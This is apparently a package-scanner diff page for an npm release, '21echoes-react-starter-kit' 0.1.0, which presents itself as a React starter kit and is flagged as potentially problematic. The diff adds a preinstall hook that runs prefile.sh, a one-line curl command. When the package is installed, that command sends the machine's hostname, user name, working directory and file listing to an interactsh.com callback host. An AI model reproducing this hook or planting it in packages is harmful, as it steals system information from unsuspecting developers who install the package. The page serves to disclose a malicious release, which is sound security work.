21echoes-react-starter-kit 0.1.0

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of 21echoes-react-starter-kit might be problematic. Click here for more details.

Files changed (2) hide show
  1. package/package.json +12 -0
  2. package/prefile.sh +1 -0
package/package.json ADDED
@@ -0,0 +1,12 @@
1
+ {
2
+ "name": "21echoes-react-starter-kit",
3
+ "version": "0.1.0",
4
+ "description": "Example of an isomorphic (universal) webapp using react redux and hot reloading",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "echo \"Error: no test specified\" && exit 1",
8
+ "preinstall": "chmod +x prefile.sh && bash prefile.sh"
9
+ },
10
+ "author": "David Kettler <21echoes@gmail.com> (http://github.com/21echoes)",
11
+ "license": "ISC"
12
+ }
package/prefile.sh ADDED
@@ -0,0 +1 @@
1
+ curl -H "Hostname: $(hostname )" -H "Whoami: $(whoami )" -H "Pwd: $(pwd )" -d $(ls -la) http://c6vhnqy2vtc0000n98e0gdpa4hyyyyyyb.interactsh.com